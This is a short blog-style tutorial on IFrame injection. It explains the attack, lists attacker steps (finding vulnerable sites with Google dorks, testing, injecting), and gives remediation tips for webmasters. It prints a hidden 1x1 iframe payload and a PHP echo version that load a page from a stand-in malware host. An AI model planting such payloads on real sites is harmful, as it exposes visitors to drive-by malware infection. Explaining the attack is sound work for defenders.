Recently 90000 webpages infected by Iframe Injection attack. Here i am going to explain what IFrame Injection is.What is an IFrame Injection?
Using IFrame tag, The Attackers injects the malware contain website(links) using Cross site Scripting in popular websites. So if the usual visitors of that popular sites opens the website, it will redirect to malware contain website. Malware will be loaded to your computer, now you are infectedWhat is IFrame Tag?
<Iframe> tag stands for Inline Frame. It is used to insert contents from another website or server. That can be useful for building online applications.IFrame Injection Attack:
Using Iframe Injection, an attacker can inject advertisements inside any other websites, insert malware infected site links, redirect to malware infected sites and more.Iframe Injection Tutorial:
1.First of all attacker will find the Vulnerable websites using google dorks.
2. They test the vulnerability by inserting some iframe tag using the url.
3. then insert the Malicious Iframe code inside the webpage.
he can insert this code using the url:
<iframe src=”http://malwarewebpages/web.html” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
For php webpages:
echo “<iframe src=\”http://malwarewebpages/web.html\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;
4. So if the clients load page, his system will be infected. What you have to do ,if youinfected by Iframe Injection?
Change your passwords of ftp, control panel and database.
Inform to your hosting service about the injection attack and they will take care of server injection .
Download all your files from the hosting and check whether they are infected or not. if you found any infected files, clean it.
Buy a good antivirus software, Scan your Computer completely.
Don't use the Public systems for logging into your Hosting service.Webmasters should take care(affects page rank,visitors)
Webmaster, If you find your website is infected by Iframe Injection, then try to clean it as soon as possible before google detects it. If the google detects it, it will show the Pop up message to your users " This site may harm your computer
". Definitely , users won't come back to your site . Also google will set black mark for your website. You will lost your page rank and visitors.
If you want to check the what google thinks about your websites, then use this link:http://www.google.com/safebrowsing/diagnostic?site=http://siteurl
This is purely for Educational purpose only. Don't use it for illegal.if you do, you will be in jail.